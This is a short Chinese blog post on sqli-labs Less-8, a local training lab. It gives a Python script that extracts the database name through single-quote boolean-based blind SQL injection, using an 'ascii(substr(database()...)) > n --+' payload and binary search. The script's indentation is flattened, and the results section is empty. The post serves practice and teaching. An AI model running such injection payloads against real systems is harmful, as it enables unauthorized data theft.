【Python】测试布尔型盲注脚本

时间:2023-03-09 00:02:53
【Python】测试布尔型盲注脚本

sqli-labs第八关:单引号布尔型盲注,手工测出database长度,个人觉得手工比较快

然后使用脚本测database内容,这个脚本就比手工快多了,脚本内容如下:

 import sys
import requests url="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s"
payload="' and ascii(substr(database(),%s,1))>%s --+"
database=''
print("Start to retrive the database")
for i in range(1,9):
max=122 #z
min=65 #A
while abs(max-min)>1:
mid=int((max+min)/2)
p=payload % (str(i),str(mid))
response=requests.get(url % p)
if response.content.find("You are in")!=-1:
min=mid
else:
max=mid
database=database+chr(max)
print("the database is :%s" % database)

测试结果:

【Python】测试布尔型盲注脚本